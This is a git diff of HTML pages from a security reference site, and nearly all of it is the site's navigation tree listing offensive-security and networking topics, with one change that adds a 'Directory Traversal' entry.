      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -211,22 +211,6 @@

Methodology

- - diff --git a/docs/Post Exploitation/Privilege Escalation/index.html b/docs/Post Exploitation/Privilege Escalation/index.html index 16f961c4..c4de1e4e 100644 --- a/docs/Post Exploitation/Privilege Escalation/index.html +++ b/docs/Post Exploitation/Privilege Escalation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Post Exploitation/index.html b/docs/Post Exploitation/index.html index 3a44b990..33037c8c 100644 --- a/docs/Post Exploitation/index.html +++ b/docs/Post Exploitation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Post Expl - - diff --git a/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html b/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html index 62aa79ed..2b201914 100644 --- a/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html +++ b/docs/Reconnaissance/Enumeration/DNS Server Enumeration (53).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
